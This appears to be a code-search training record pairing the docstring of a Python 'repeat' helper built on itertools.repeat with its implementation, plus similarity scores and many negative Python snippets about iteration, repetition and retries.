[ "0.77041095", "0.73121995", "0.68373466", "0.68154997", "0.64987105", "0.64865166", "0.64855176", "0.61515063", "0.61507326", "0.6116417", "0.585476", "0.5825893", "0.5797128", "0.5789132", "0.57815135", "0.5774213", "0.577342", "0.5757885", "0.5697775", "0.56689405", "0.5658311", "0.5647523", "0.5640964", "0.56174076", "0.5600153", "0.55896604", "0.55807495", "0.55608416", "0.55259067", "0.54828894", "0.54716885", "0.54686093", "0.5452897", "0.5435661", "0.54349595", "0.53902084", "0.5389542", "0.53804487", "0.5373242", "0.5367215", "0.5331997", "0.53189427", "0.53159785", "0.53050447", "0.53019166", "0.5301752", "0.5287728", "0.528371", "0.5276838", "0.527277", "0.52724755", "0.52679473", "0.52679205", "0.5262095", "0.52521235", "0.5243606", "0.5241918", "0.5239871", "0.52268285", "0.5223724", "0.5222459", "0.52136475", "0.5208558", "0.5208425", "0.5195463", "0.5191771", "0.5186492", "0.5181479", "0.5171553", "0.5169217", "0.5169217", "0.5169217", "0.5165681", "0.5141766", "0.5139018", "0.5137213", "0.513629", "0.5134784", "0.51278305", "0.5126535", "0.51230067", "0.51094174", "0.51025397", "0.5100205", "0.5096645", "0.50856036", "0.5079041", "0.5078115", "0.5077964", "0.5077669", "0.5075161", "0.5068543", "0.5068077", "0.50647646", "0.505522", "0.505522", "0.50542426", "0.5044087", "0.50426155", "0.50360745" ]
0.78215605
0
Returns the object for the specified number of times. If not specified, returns the object endlessly.
def repeat(obj, times=None):
    if times is None:
        return Iter(itertools.repeat(obj))
    return Iter(itertools.repeat(obj, times))
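For reference, the itertools behavior being wrapped (a sketch; `Iter` is assumed to be a thin iterator wrapper):

import itertools

print(list(itertools.repeat(10, 3)))       # [10, 10, 10]
endless = itertools.repeat(10)             # no times given: repeats forever
print(list(itertools.islice(endless, 4)))  # [10, 10, 10, 10]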
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def repeat(self, count):\n return self.Sequence((self,) * count)", "def repeat(self, fn, *args, **kwargs):\n return repeat_n_times(self.n, fn, *args, **kwargs)", "def twist(r, num_repeats=1):\n for i in range(num_repeats):\n r.go(0, 50)\n time.sleep(.75)\n r.stop()\n time.sleep(.1)\n r.go(0, -50)\n time.sleep(.75)\n r.stop()\n time.sleep(.1)", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def repeat(num_times):\n\n def decorator_repeat(func):\n \"\"\"\n defines wrapper_repeat(*args, **kwargs)\n\n :returns: wrapper_repeat\n \"\"\"\n\n @functools.wraps(func)\n def wrapper_repeat(*args, **kwargs):\n \"\"\"\n func(*args, **kwargs) num_times\n\n :return: last return value\n \"\"\"\n for _ in range(num_times):\n value = func(*args, **kwargs)\n return value\n\n return wrapper_repeat\n\n return decorator_repeat", "def retry(times):\n return repeat_with_success_at_least(times, 1)", "def repeat(iterable, count=None):\n if count is None:\n while True:\n for sample in iterable:\n yield sample\n else:\n for i in range(count):\n for sample in iterable:\n yield sample", "def range(self, n):\n for i in range(n):\n yield self.get()", "def repeat_count(instance, args):\r\n count = instance.repeat_count(args)\r\n return count", "def run(self,n=10):\n return self.transduce([None] * n)", "def take(n, iterable, islice=islice):\n return islice(iterable, n)", "def taking(n):\n if n <= 0:\n raise ValueError('taking() requires a positive value.')\n\n @coroutine\n def gen(target):\n for _ in range(n):\n x = (yield)\n target.send(x)\n\n raise StopConsumption()\n\n return gen", "def limit(iterable, n):\n for count, element in enumerate(iterable):\n if count >= n: break\n else: yield element", "def next_n(self, n: int, fast_forward=False):\n data = []\n while len(data) < n:\n try:\n record = self.queue.get(True, self.wait)\n data.append(record)\n except Empty:\n raise StopIteration\n return data", "def nextNumberOfResults(self, N=10):\n self.start += self.N\n self.N = N", "def take(iterable, n):\n\n def taking(iterable_):\n for i, e in enumerate(iterable_):\n if i < n:\n yield e\n\n return taking(iterable)", "def get_first_n_crawled_chunks(self, number):\n try:\n conn = psycopg2.connect(\"dbname='{0}'\".format(DATABASE))\n cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n cur.execute(\"SELECT * FROM crawler WHERE c_task = 'crawled' ORDER BY index LIMIT %s;\", (number,))\n results = cur.fetchall()\n cur.close()\n return results\n except Exception as e:\n print(e)", "def forever(shard):\n def repeat(*args, **kwargs):\n while True:\n for delay in shard(*args, **kwargs):\n yield delay\n return repeat", "def next(self, x):\n self.next_called_n_times += 1\n return SequentialTaskCollection.next(self, x)", "def repeat(seq, n):\n for e in seq:\n for _ in range(n):\n yield e", "def next ( num = 1 ) :\n return run ( num )", "def test_orm_full_objects_chunks(n):\n\n sess = Session(engine)\n for obj in sess.query(Customer).yield_per(100).limit(n):\n print(obj.name)", "def take_nth(n):\n def _take_nth_xducer(step):\n outer = {\"idx\": 0}\n def _take_nth_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n if outer[\"idx\"] % n:\n outer[\"idx\"] += 1\n return r\n else:\n outer[\"idx\"] += 1\n return step(r, x)\n return _take_nth_step\n return _take_nth_xducer", "def create_n_items(n):\n total_objects = models.Item.objects.all().count()\n for i in range(n):\n models.Item.objects.create(\n name=\"Randomly generated object {}\".format(i+total_objects),\n 
value=random.random() * 1000000\n )", "def repeat_every(repeats=5, every=2):\n\n def repeat_wrapper(func):\n @functools.wraps(func)\n def func_wrapper(*args, **kwargs):\n for _ in range(repeats):\n value = func(*args, **kwargs)\n if value:\n return value\n time.sleep(every)\n\n return func_wrapper\n\n return repeat_wrapper", "def peek(self, n: int | None = None) -> Any:\n self._fillcache(n)\n if n is None:\n result = self._cache[0]\n else:\n result = [self._cache[i] for i in range(n)]\n return result", "def shake(r, num_repeats=1):\n for i in range(num_repeats):\n r.go(25)\n time.sleep(.1)\n r.stop()\n time.sleep(.1)\n r.go(-25)\n time.sleep(.1)\n r.stop()\n time.sleep(.1)", "def repeat(value: T, times: int) -> List[T]:\n return [value] * times", "def loop(func, n):\n for i in range(n):\n func()", "def nth(n, iterable, default = None):\n return next(islice(iterable, n, None), default)", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def take(n, seq):\n return itertools.islice(seq, n)", "def fast_forward(self, n):\n self.random(n=n)\n return self", "def repeat_circle(obj, *loop_args):\n # if loop_args == (): # tuple is empty\n if not loop_args: # tuple is empty\n loop_args = (5, 201, 5)\n obj.begin_fill()\n for n in range(loop_args[0], loop_args[1], loop_args[2]):\n obj.circle(n)\n obj.end_fill", "def retry(\n self, n: int, /, *args, error: Catchable = Exception, sleep=None, **kwargs\n ) -> \"fn\":\n\n func = self._mod.retry(n, self, error=error, sleep=sleep)\n return func(*args, **kwargs)", "def acquire(self, n, starting=0, batch_size=None):\n sl = slice(starting, starting+n)\n if self._generate_index < sl.stop:\n self.generate(sl.stop - self._generate_index, batch_size=batch_size)\n return self.get_slice(sl)", "def take(n, iterable):\n return list(islice(iterable, n))", "def take(n, iterable):\n return list(islice(iterable, n))", "def Repeat(dataset, count=None):\n return dataset.repeat(count=count)", "def __getitem__(self, i): #i is index given by the caller\n l_self = len(self)\n if i >= self.times * l_self:\n raise IndexError (\"Circle object goes around %d times\" % (self.times)) #raise IndexError\n return self.data[i % l_self] # return answer", "def take(n):\n def _take_xducer(step):\n outer_vars = {\"counter\": n}\n def _take_step(r=Missing, x=Missing):\n if r is Missing: return step()\n if x is Missing:\n return step(r)\n n = outer_vars[\"counter\"]\n outer_vars[\"counter\"] -= 1\n r = step(r, x) if n > 0 else r\n return ensure_reduced(r) if outer_vars[\"counter\"] <= 0 else r\n return _take_step\n return _take_xducer", "def times(self, fn):\n for i in range(0, self._):\n fn()\n return self", "def next_n(iterator, N):\n try:\n items = []\n for _ in range(N):\n items.append(next(iterator))\n return items\n except StopIteration:\n if items:\n return items\n return None", "def get_random_objects(model=None, queryset=None, count=float('+inf')):\n\n if not queryset:\n try:\n queryset = model.objects.all()\n except AttributeError:\n raise ValueError(\"You must provide a model or a queryset\")\n\n max_ = queryset.aggregate(Max('id'))['id__max']\n i = 0\n while i < count:\n try:\n yield queryset.get(pk=randint(1, max_))\n i += 1\n except queryset.model.DoesNotExist:\n pass", "def repeated(f, n, x):\n if n == 1:\n return f(x)\n else:\n return repeated(f,n-1,f(x))", "def iterate(self,N = None):\n result = self.iterate_loop(N)\n #self.writeToFile()\n\n #TODO: We need a timeout for really long executions, but it won't work because it opens another blender instance! 
Fix this!\n \"\"\"\n queue = multiprocessing.Queue(1) # Maximum size is 1\n proc = multiprocessing.Process(target=self.iterate_wrapper, args=(self, queue, N))\n proc.start()\n\n # Wait for TIMEOUT seconds\n try:\n result = queue.get(True, TIMEOUT)\n except Queue.Empty:\n # Deal with lack of data somehow\n result = None\n print(\"TIMEOUT reached! The pString is too long!\")\n finally:\n proc.terminate()\n \"\"\"\n return result", "async def repeat(self,ctx, times: int, content='repeating...'):\n for i in range(times):\n await ctx.send(content)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def nth(iterable, n, default=None):\n return next(islice(iterable, n, None), default)", "def repeat_string_n_times(string, count):\r\n return string * int(count)", "def take(n, iterable):\n return list(itertools.islice(iterable, n))", "def take(n, iterable):\n return list(itertools.islice(iterable, n))", "async def repeat(ctx, times: int, content='repeating...'):\n for i in range(times):\n await ctx.send(content)", "def data_repeated(data):\n\n def gen(count):\n for _ in range(count):\n yield data\n\n yield gen", "def _Get(self, count):\n if count > MAXIMUM_RESULTS:\n count = MAXIMUM_RESULTS\n entity_list = self._Next(count)\n while len(entity_list) < count and self.__more_results:\n next_results = self._Next(count - len(entity_list))\n if not next_results:\n break\n entity_list += next_results\n return entity_list;", "def _maybe_repeat(x, n):\n if isinstance(x, list):\n assert len(x) == n\n return x\n else:\n return [x] * n", "def firstn(reader, n):\n\n # TODO(yuyang18): Check if just drop the reader, could clean the opened\n # resource or not?\n\n def firstn_reader():\n for i, item in enumerate(reader()):\n if i == n:\n break\n yield item\n\n return firstn_reader", "def repeat(self, count):\n x = _OSeq()\n for i in range(count):\n x = x.concatenate(self)\n return x", "def get_next(self, limit, offset, count):\r\n if offset + limit >= count:\r\n return None\r\n\r\n return self._generate_uri(limit, offset + limit)", "def bottle_song_while(num):\n pass", "def several(self, times: int):\n return BagOfGoods({g: self[g] * times for g in self.keys()})", "def xrndSphere(n):\n for i in xrange(n):\n yield rndSphere()", "def take(iterable, n):\n return list(itertools.islice(iterable, n))", "def get_last(self, count):", "def repeat(self, count):\n x = HSeq()\n for i in range(count):\n x = x.concatenate(self)\n return x", "async def repeat(ctx, times : int, content='repeating...'):\n for i in range(times):\n await bot.say(content)", "def repeated_iteration(self) -> global___Statement.Iteration.RepeatedIteration:", "def get_first_n_pending_links(self, number):\n try:\n conn = psycopg2.connect(\"dbname='{0}'\".format(DATABASE))\n cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)\n cur.execute(\"SELECT link FROM link WHERE chunk_id IS NULL AND state = 'pending' ORDER BY index LIMIT %s;\", (number,))\n results = cur.fetchall()\n cur.close()\n return results\n except Exception as e:\n print(e)", "async def auto_page_coro(coro, *args, **kwargs):\n\n objs = []\n kwargs[\"offset\"] = 0\n kwargs[\"n\"] = 100\n while True:\n response = await coro(*args, **kwargs)\n\n objs += response\n kwargs[\"offset\"] += 100\n\n if len(response) < 100:\n break\n\n return objs", "def retry(num=5):\n s = requests.Session()\n retries = Retry(total=num, backoff_factor=0.1,\n status_forcelist=[500, 
502, 503, 504])\n s.mount('http://', HTTPAdapter(max_retries=retries))\n\n return s", "async def repeat(times : int, content='repeating...'):\n for i in range(times):\n await bot.say(content)", "def consume (self, n) :\r\n if (n<0 or n>len(self)) :\r\n m = \"Trying to consume more data than in Circ. Buff\"\r\n raise Exception(m)\r\n \r\n self.empty_ = (n==len(self))\r\n self.nextGet_ = (self.nextGet_+n) % self.capacity()", "def limit(self, max_size):\n return self.__class__(itertools.islice(self, max_size))", "def nth(n):\n\n if n >= 0:\n @sinks\n def _dagpype_internal_fn_act_p(target):\n i = 0\n try:\n while True:\n e = (yield)\n if i == n:\n target.send(e)\n target.close()\n return\n i += 1\n except GeneratorExit:\n target.close()\n\n return _dagpype_internal_fn_act_p\n\n @sinks\n def _dagpype_internal_fn_act_n(target):\n q = collections.deque([], -n)\n try:\n while True:\n q.append((yield))\n except GeneratorExit:\n if len(q) >= -n:\n target.send(q.popleft())\n target.close()\n\n return _dagpype_internal_fn_act_n", "def forever():\n\n def animate(thing):\n thing = list(thing)\n yield from repeat(thing)\n return animate", "def wiggle(r, num_repeats=2):\n for i in range(num_repeats):\n r.go(-10)\n time.sleep(.5)\n r.stop()\n r.go(10)\n time.sleep(.5)\n r.stop()\n for i in range(num_repeats):\n r.go(0, 30)\n time.sleep(2)\n r.stop()\n r.go(0, -30)\n time.sleep(2)\n r.stop()", "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def repeat_nd(x, reps):\n return RepeatND(reps)(x)", "def stream_n_messages(n):\n response = get_dict(\"url\", \"args\", \"headers\", \"origin\")\n n = min(n, 100)\n\n def generate_stream():\n for i in range(n):\n response[\"id\"] = i\n yield json.dumps(response) + \"\\n\"\n\n return Response(generate_stream(), headers={\"Content-Type\": \"application/json\"})", "def get_next_objectives(self, n=None):\n if n > self.available():\n # !!! This is not quite as specified (see method docs) !!!\n raise IllegalState('not enough elements available in this list')\n else:\n next_list = []\n x = 0\n while x < n:\n try:\n next_list.append(next(self))\n except Exception: # Need to specify exceptions here!\n raise # OperationFailed()\n x = x + 1\n return next_list", "def _fillcache(self, n: int | None) -> None:\n if not n:\n n = 1\n try:\n while len(self._cache) < n:\n self._cache.append(next(self._iterable)) # type: ignore\n except StopIteration:\n while len(self._cache) < n:\n self._cache.append(self.sentinel)", "def takeNGenerator(seq, n):\n\tindex = 0\n\twhile index + n <= len(seq):\n\t\tyield seq[index:index + n]\n\t\tindex = index + 1", "def limit(iterator, n=None):\n for i, v in enumerate(iterator):\n yield v\n if i + 1 == n:\n break", "async def readexactly(self,\n n: int\n ) -> bytes:\n if n < 1:\n return b''\n\n future = asyncio.Future()\n try:\n self._read_queue.put_nowait((future, True, n))\n return await future\n\n except aio.QueueClosedError:\n raise ConnectionError()", "def repeat_value(value: Any = None, repeat_count: int = None) -> ObservableBase:\n from ..operators.observable.repeat import repeat_value\n return repeat_value(value, repeat_count)", "def __next__(self):\n self.idx += 1\n if self.idx >= len(self):\n self.cycles += 1\n self.restart()\n if not self.can_recycle():\n raise StopIteration(f\"Error max cycles have been reached for this GSM object. 
cycles={self.cycles}\")\n # if self.max_cycles >= 0:\n # if self.cycles >= self.max_cycles:\n # raise StopIteration(f\"Error max cycles have been reached for this GSM object. cycles={self.cycles}\")\n return self.state()", "def nth(iterable, n, next=next, islice=islice, default=None):\n return next(islice(iterable, n, None), default)", "def get_one_item_at_a_time(url, additional_params=None, session=None):\n query_params = {'page': 1, 'per_page': 100}\n query_params.update(additional_params or {})\n req = session or requests\n response = req.get(url, headers=get_headers(), params=query_params)\n response.raise_for_status()\n yield from response.json()\n\n pages_count = get_pages_count(response.links)\n while query_params['page'] < pages_count:\n query_params['page'] += 1\n response = req.get(\n url, headers=get_headers(), params=query_params,\n )\n response.raise_for_status()\n yield from response.json()", "def _get_more(self):\n if not self.alive:\n raise pymongo.errors.InvalidOperation(\n \"Can't call get_more() on a MotorCursor that has been exhausted or killed.\")\n\n self.started = True\n return self._refresh()", "def cycle(obj):\r\n while True:\r\n for item in obj:\r\n yield item", "def repeater(seconds):\n return lambda function: TwistedRepeater(function, seconds)", "def skip(self, n):\n return self.__class__(itertools.islice(self, n, None))", "def count_to(count):\n numbers = [\"one\", \"two\", \"three\", \"four\", \"five\"]\n for number in numbers[:count]:\n yield number", "def take(num, iterable):\n for i, e in enumerate(iterable):\n if i >= num:\n break\n yield e", "def make_parallel(self, n):\n return super().make_parallel(n, True)", "def iterate(iterator, n):\n # throw away n-1 elements\n for index in range(1, n):\n next(iterator, None)\n\n return next(iterator, None)", "def take(n, seq):\n seq = iter(seq)\n result = []\n try:\n for i in range(n):\n result.append(next(seq))\n except StopIteration:\n pass\n return result", "def __init__(self, iterable_input, n=1, name='re-repeat', verbose=True):\n super().__init__(iterable_input=iterable_input, name=name, verbose=verbose)\n self.n = n", "def _fillcache(self, n: int | None) -> None:\n if not n:\n n = 1\n try:\n while len(self._cache) < n:\n self._cache.append(self.modifier(next(self._iterable))) # type: ignore\n except StopIteration:\n while len(self._cache) < n:\n self._cache.append(self.sentinel)" ]
[ "0.6203525", "0.59771645", "0.5969791", "0.5901691", "0.5872414", "0.5850168", "0.58327895", "0.58200485", "0.57241195", "0.5649693", "0.56443447", "0.5643324", "0.56162107", "0.5555079", "0.5550507", "0.5531917", "0.54840827", "0.54764825", "0.5443261", "0.54094815", "0.5397046", "0.5382421", "0.53783256", "0.5375706", "0.5357077", "0.5341014", "0.53331083", "0.5319535", "0.5316214", "0.5314601", "0.5313443", "0.53084964", "0.52992326", "0.5296599", "0.5294995", "0.5291142", "0.5284468", "0.5284468", "0.5267768", "0.5264937", "0.5263421", "0.52609307", "0.5253008", "0.5250111", "0.5234527", "0.5230434", "0.5196677", "0.51896995", "0.51896995", "0.51896995", "0.5180369", "0.51665336", "0.51665336", "0.51654214", "0.5163836", "0.51520205", "0.5149158", "0.5141494", "0.51404476", "0.5133075", "0.5121863", "0.51122105", "0.510719", "0.5105943", "0.5105853", "0.5103782", "0.5089377", "0.50874346", "0.50713634", "0.5066428", "0.50620234", "0.5056194", "0.5052338", "0.50518745", "0.50402945", "0.503887", "0.5035291", "0.50270516", "0.50173515", "0.5013969", "0.501096", "0.50043", "0.50040114", "0.5003617", "0.50014657", "0.49924096", "0.4988643", "0.4988382", "0.49822184", "0.49813116", "0.4981109", "0.49802476", "0.49753124", "0.49724236", "0.49683198", "0.49682963", "0.49589777", "0.49582493", "0.4953386", "0.49529937" ]
0.64713174
0
Make infinite calls to a function with the given arguments. End sequence if func() raises StopIteration.
def repeatedly(func, /, *args, **kwargs):
    func = to_callable(func)
    try:
        while True:
            yield func(*args, **kwargs)
    except StopIteration as e:
        yield from stop_seq(e)
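A sketch of the StopIteration escape hatch in use; `to_callable` and `stop_seq` are assumed helpers from this library that are not shown here, so the call at the end is left commented:

import random

def roll_until_six():
    # Raising StopIteration from this plain function signals "stop" to
    # repeatedly(); the generator catches it explicitly, so PEP 479's
    # StopIteration-to-RuntimeError conversion never applies here.
    x = random.randint(1, 6)
    if x == 6:
        raise StopIteration
    return x

# rolls = list(repeatedly(roll_until_six))  # finite stream: ends at the first 6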
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def iterate(func, x):\n while True:\n x = func(x)\n yield x", "def iterate(f, x):\n while True:\n yield x\n x = f(x)", "def iterate(func: Callable[..., T], x: T, *args, index: Index = None):\n func = to_callable(func)\n index = to_index_seq(index)\n\n if index is None and not args:\n out = _iterate(func, x)\n elif index is None:\n out = _iterate_n(func, (x, *args))\n else:\n if not args:\n out = _iterate_indexed(func, index, x)\n else:\n out = _iterate_indexed_n(func, index, (x, *args))\n\n return Iter(out)", "def loop(func):\n def wrapper(*a, **b):\n while True:\n func(*a, **b)\n return wrapper", "def repeat(fun, n):\n for i in range(n):\n yield fun()", "def infinite_loop(func):\n @wraps(func) # Preserve target's metadata\n def wrapper(*args, **kwargs):\n while True:\n try:\n func(*args, **kwargs)\n except KeyboardInterrupt:\n break\n return wrapper", "def iter_sequence_infinite(seq):\n while True:\n for item in seq:\n yield item", "def coroutine(f, *a, **kw):\n i = f(*a, **kw)\n i.next()\n return i", "def iter_except(func, exception):\n try:\n while True:\n yield func()\n except exception:\n pass", "def iter_except(func, exception, first=None):\n try:\n if first is not None:\n yield first()\n while True:\n yield func()\n except exception:\n pass", "def make_func_repeater(f, x):\n\n def repeat(i, x=x):\n if i == 0:\n return x\n else:\n return repeat(i-1, f(x))\n return repeat", "def retryCall(fn, args=None, keywordArgs=None, failureTester=None, sleepManager=None):\n sleepManager = sleepManager or time.SleepManager()\n while True:\n try:\n result = yield fn(*args, **keywordArgs)\n defer.returnValue(result)\n except Exception: # pylint: disable=W0703\n failureTester(failure.Failure())\n yield sleepManager.sleep()", "def RunCoroutineOrFunction(function, args=[]):\r\n if inspect.isgeneratorfunction(function):\r\n coroutine = function(*args)\r\n response = yield coroutine.next()\r\n while True:\r\n response = yield coroutine.send(response)\r\n else:\r\n function(*args)", "def iter_except(function, exception):\n try:\n while True:\n yield function()\n except exception:\n return", "def chained(func):\n def wrapper(*args, **kwargs):\n for xs in func(*args, **kwargs):\n for x in xs:\n yield x\n return wrapper", "def iter_except(function, exception):\r\n try:\r\n while True:\r\n yield function()\r\n except exception:\r\n return", "def unfold(func, seed):\n try:\n elem = func(seed)\n while elem is not None:\n seed, x = elem\n yield x\n elem = func(seed)\n except StopIteration as e:\n yield from stop_seq(e)", "def retrying(func, *retry_args, **retry_kwargs):\n yield retriable(*retry_args, **retry_kwargs)(func)", "def repeat_func(func, *args, **kwargs):\n if kwargs:\n return starmap(lambda args, kwargs: func(*args, **kwargs),\n repeat((args, kwargs))\n )\n else:\n return starmap(func, repeat(args))", "def wrapper_fn(*args, **kwargs):\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)", "def loop(func, n):\n for i in range(n):\n func()", "def run_with_args(self):\n while True:\n if self.cancelled:\n return\n self.func(self.args)\n time.sleep(self.sleep_time / 1000.00)", "def coroutine(func):\n\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n\n return start", "def filtern(func: Callable, iterable: Iterable):\n return next(filter(func, iterable))", "def coroutine(func):\n def 
start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def coroutine(func):\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def coroutine(func):\n def start(*args, **kwargs):\n cr = func(*args, **kwargs)\n next(cr)\n return cr\n return start", "def generator(func):\n\n @fn\n @wraps(func)\n def gen(*args, **kwargs):\n return Iter(func(*args, **kwargs))\n\n return gen", "def call(self, func: Callable[..., T], *args: Any, **kwargs: Any) -> T:\n ret = None\n\n self.before_call(func, *args, **kwargs)\n for listener in self._breaker.listeners:\n listener.before_call(self._breaker, func, *args, **kwargs)\n\n try:\n ret = func(*args, **kwargs)\n if isinstance(ret, types.GeneratorType):\n return self.generator_call(ret)\n\n except BaseException as e:\n self._handle_error(e)\n else:\n self._handle_success()\n return ret", "def interleave(inter, f, seq):\n seq = iter(seq)\n try:\n f(next(seq))\n except StopIteration:\n pass\n else:\n for x in seq:\n inter()\n f(x)", "def _pipe_and_accumulate(val, fns):\n for fn in fns:\n val = fn(val)\n yield val", "def mapping(f):\n @coroutine\n def gen(target):\n while True:\n x = yield\n target.send(f(x))\n return gen", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def repeatfunc(func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "async def concurrently_execute(\n func: Callable[[T], Any],\n args: Iterable[T],\n limit: int,\n delay_cancellation: bool = False,\n) -> None:\n it = iter(args)\n\n async def _concurrently_execute_inner(value: T) -> None:\n try:\n while True:\n await maybe_awaitable(func(value))\n value = next(it)\n except StopIteration:\n pass\n\n # We use `itertools.islice` to handle the case where the number of args is\n # less than the limit, avoiding needlessly spawning unnecessary background\n # tasks.\n if delay_cancellation:\n await yieldable_gather_results_delaying_cancellation(\n _concurrently_execute_inner,\n (value for value in itertools.islice(it, limit)),\n )\n else:\n await yieldable_gather_results(\n _concurrently_execute_inner,\n (value for value in itertools.islice(it, limit)),\n )", "def coroutine(func):\n @wraps(func)\n def primer(*args, **kwargs):\n gen = func(*args, **kwargs)\n next(gen)\n return gen\n return primer", "def scan(func, iterable, start=_EMPTY, *, echo_start=True):\n it = iter(iterable)\n if start is _EMPTY:\n start = next(it)\n if echo_start:\n yield start\n for item in it:\n start = func(start, item)\n yield start", "def repeatfunc(func, n, *args):\n return starmap(func, repeat(args, n))", "def repeatfunc(cls, func, times=None, *args):\n if times is None:\n return starmap(func, repeat(args))\n return starmap(func, repeat(args, times))", "def lift(f: Callable[..., Data]) -> LiftedFunc:\n def inner(*args: Result) -> Result:\n out = []\n for args1 in itertools.product(*args):\n val = f(*args1)\n out.append(val)\n return out\n return inner", "def postorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n last = None\n for arg in args:\n if testFn(arg):\n for a in postorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n if last:\n yield last\n last = arg\n if last:\n yield last\n else:\n for arg in args:\n yield arg", "def preorderIterArgs(limit=sys.getrecursionlimit(), testFn=isIterable, *args):\n if limit:\n for arg in 
args:\n if testFn(arg):\n for a in preorderIterArgs(limit - 1, testFn, *arg):\n yield a\n else:\n yield arg\n else:\n for arg in args:\n yield arg", "def progression(first_item:int, amount:int,func):\n item = first_item\n count = 0\n stop = False\n while count < amount and not stop:\n stop = yield item\n item = func(item)\n count += 1", "def iter_except(cls, func, exception, first=None):\n try:\n if first is not None:\n yield first() # For database APIs needing an initial cast to db.first()\n while True:\n yield func()\n except exception:\n pass", "def run_no_args(self):\n while True:\n if self.cancelled:\n return\n self.func()\n time.sleep(self.sleep_time / 1000.00)", "def _call_n(x, f, n, *args, **kwargs):\n return [f(i, x, *args, **kwargs) for i in range(n)]", "def deferrable(function):\n\n def pseudocore(*args, **kwargs):\n yield function(*args, **kwargs)\n\n return function if isinstance(function, Routine) else routine(pseudocore)", "def _for_each_generator(self,\n func: Callable[..., Any],\n *args: Iterable[Any]) -> List[Any]:\n return [func(gen, *args_for_func) for gen, args_for_func in zip(\n self._generators, zip(*args))]", "def Continuous(forever=True):\r\n def wrap(func):\r\n def wrapped(*args, **kwargs):\r\n rslt = None\r\n rslt = func(*args, **kwargs)\r\n while forever:\r\n rslt = func(*args, **kwargs)\r\n return rslt\r\n wrapped.__name__ = func.__name__\r\n wrapped.__doc__ = func.__doc__\r\n wrapped.__dict__.update(func.__dict__)\r\n return wrapped\r\n return wrap", "def wrap_generator(func):\n\n async def _wrapped(*a, **k):\n r, ret = None, []\n gen = func(*a, **k)\n while True:\n try:\n item = gen.send(r)\n except StopIteration:\n break\n if inspect.isawaitable(item):\n r = await item\n else:\n r = item\n ret.append(r)\n\n if len(ret) == 1:\n return ret.pop()\n return ret\n\n return _wrapped", "def fib():\n x, y = 0, 1\n while True:\n yield x\n x, y = y, x + y", "def __call__(self, func):\n timeouts = _exponential_timeout_generator(\n self._initial, self._maximum, self._multiplier, self._deadline)\n\n @general_helpers.wraps(func)\n def func_with_timeout(*args, **kwargs):\n \"\"\"Wrapped function that adds timeout.\"\"\"\n kwargs['timeout'] = next(timeouts)\n return func(*args, **kwargs)\n\n return func_with_timeout", "def wrapped_fn(*args, **kwargs):\n for delay in delays():\n try:\n return fn(*args, **kwargs)\n except Exception as e: # pylint: disable=broad-except)\n if is_retriable is None:\n continue\n\n if is_retriable(e):\n time.sleep(delay)\n else:\n raise\n return fn(*args, **kwargs)", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def _fold_loop(cls, f, agg, next):\n\n while next is not None:\n (val, next) = next\n agg = f(val, agg)\n return agg", "def fibonacci(a, b, limit=None):\n loop_indefinitely = limit is None\n while loop_indefinitely or b < limit:\n yield b\n a, b = b, a + b", "def consumer(func):\n\n from functools import wraps\n\n @wraps(func)\n def wrapper(*args,**kw):\n gen = func(*args, **kw)\n gen.next()\n return gen\n return wrapper", "def scanr(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanr must be callable\")\n itr = iter(itr)\n \n return _scanr(func, start, itr)", "def ex(self, fn, *args, **kwargs):\n if len(args) == 0 and len(kwargs) == 0:\n self.down_queue.put(fn)\n else:\n\n def closure():\n return fn(*args, **kwargs)\n\n self.down_queue.put(closure)", "def fibonacci(multiplier, limit):\n def func():\n if multiplier < 0:\n raise ValueError('multiplier must be 
non-negative')\n\n if limit < 0:\n raise ValueError('limit must be non-negative')\n\n a, b = 0, 1\n for _ in range(limit):\n a, b = b, a + b\n yield a * multiplier\n\n return func", "def fib(limit):\n a, b = 0, 1\n while a <= limit:\n yield a\n a, b = b, a + b", "def scanl(func, start, itr):\n if not callable(func):\n raise TypeError(\"First argument to scanl must be callable\")\n itr = iter(itr)\n\n return _scanl(func, start, itr)", "def receive_fn(fn: Callable):\n\n global __enveloop_number_of_loops__\n\n __enveloop_number_of_loops__[fn.__name__] = number_of_loops\n\n @functools.wraps(fn)\n def wrapper_fn(*args, **kwargs):\n \"\"\"Function that does the actual wrapping.\n :param args:\n :param kwargs:\n :return: function response\n \"\"\"\n\n if __enveloop_number_of_loops__[fn.__name__] > 0:\n __enveloop_number_of_loops__[fn.__name__] -= 1\n return fn(*args, **kwargs)\n else:\n del __enveloop_number_of_loops__[fn.__name__]\n if callback:\n return callback(*args, **kwargs)\n\n return wrapper_fn", "def coroutine(func):\n def start(*args,**kwargs):\n coro = func(*args,**kwargs)\n coro.next()\n return coro\n return start", "def threadsafe_generator(f):\n\tdef g(*a, **kw):\n\t\treturn threadsafe_iter(f(*a, **kw))\n\treturn g", "def forever(iterable):\n it = iter(iterable)\n while True:\n try:\n yield next(it)\n except Exception as e:\n print(e)\n it = iter(iterable)", "def __call__(self, func, *args):\n\n def wrapped_func(*args, **kwargs):\n\n count = 